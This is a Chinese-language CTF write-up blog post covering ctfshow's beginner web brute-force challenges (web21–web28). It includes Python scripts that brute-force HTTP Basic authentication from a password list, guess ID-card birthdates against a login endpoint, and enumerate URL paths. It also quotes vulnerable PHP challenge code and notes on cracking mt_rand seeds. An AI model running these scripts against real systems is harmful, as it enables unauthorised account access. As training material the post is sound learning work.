ctfshow-web入门-爆破


web21

抓包后发现密码base64加密,然后写py脚本跑

import base64
import random,requests
import time

from bs4 import BeautifulSoup
url = 'http://8ae34bab-0586-4bd7-8f4a-3fcef2e95cc8.challenge.ctf.show:8080/'
with open("payload.txt",'r') as a:
    for i in a:
        # print(i,end="")
        i = i.replace("\n","")
        x = i
        i = "admin:" + i
        i = i.encode('utf-8')
        j = base64.b64encode(i).decode('utf-8')

        print(j)
        header = {
            'Authorization': 'Basic %s'%j
        }
        res = requests.get(url,headers = header)
        # print(requests.get(url,headers = header).text)
        if res.text.find("需要用户名和密码才能继续访问")==-1:
            print ("密码已找到:"+x)
            # print(requests.get(url,headers = header).text)
            break

        else:

            print("密码错误:"+x)
        time.sleep(0.2)
j = "admin:shark13"
j = j.encode('utf-8')
j = base64.b64encode(j)
j = j.decode('utf-8')
print(j)
header = {
    'Authorization': 'Basic %s' % j
}
print(requests.get(url,headers=header).text)

web22

暂无

web23

拿到源码后分析

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 11:43:51
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-03 11:56:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);

include('flag.php');
if(isset($_GET['token'])){
    $token = md5($_GET['token']);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
            echo $flag;
        }
    }
}else{
    highlight_file(__FILE__);

}
?>

可以看到是先把token变成md5加密后的然后比较第2位,第15位,第18位,然后观察到第一位取整在分母,所以只要取第32取整为3并且第2位不为0的字符就可以,写个py跑一下

import base64
import hashlib
import random,requests
import time
def toint(m):
    if ord(m)<=57 and ord(m)>=48:
        return ord(m)-48
    else:
        return 0
for x in range(33,127):
    for y in range(33,127):
        i = chr(x)
        j = chr(y)
        i = i+j
        flag = i
        i = i.encode('utf-8')
        a = hashlib.md5()
        a.update(i)
        m = a.hexdigest()
        if m[1:2] == m[14:15] and m[14:15] == m[17:18]:
            if toint(m[31:32])==3 and toint(m[1:2])!=0:
                print(flag)


web24

拿到随机种子,自己去试试,得到第一个随机数,传参数进去即可

web25

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 13:56:57
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-03 15:47:33
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(hexdec(substr(md5($flag), 0,8)));
    $rand = intval($r)-intval(mt_rand());
    if((!$rand)){
        if($_COOKIE['token']==(mt_rand()+mt_rand())){
            echo $flag;
        }
    }else{
        echo $rand;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}
?>

分析函数,先输入?r=0得到第一个随机数,然后放入php_mt_seed中爆破,得到前三个种子带进去得到

web26

Chrome抓包以后传空参数、

web27

打开录取名单以后构造身份证

抓包然后构造函数,爆破

import random
import time

import requests
url = 'http://0b797204-18d0-4296-90e3-f36aa2191111.challenge.ctf.show:8080/info/checkdb.php'
str = '621022%04d%02d%02d5237'
for i in range(1990,1991):
    for j in range(1,13):
        for k in range(1,32):
            # print(str%(i,j,k))
            temp = str%(i,j,k)
            data = {
                "a":"高先伊",
                "p":temp,
            }
            res = requests.post(url,data=data)
            if res.text.find("error") ==-1:
                print(temp)
                exit()
            else:
                print("error",temp)
            time.sleep(0.2)

web28

拿到以后查看url发现可以爆破,写脚本爆破

import random
import time

import requests
url = 'http://b6a7edd3-c1f1-4a06-b898-a1187dd11bad.challenge.ctf.show:8080/%s/%s/index.php'
for i in range(101):
    for j in range(101):
        temp= url%(i,j)
        res = requests.get(temp)
        if res.status_code == 200:
            print(res.text)
            exit()
        else:
            print("error",temp)

文章作者: Rolemee
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Rolemee !
  目录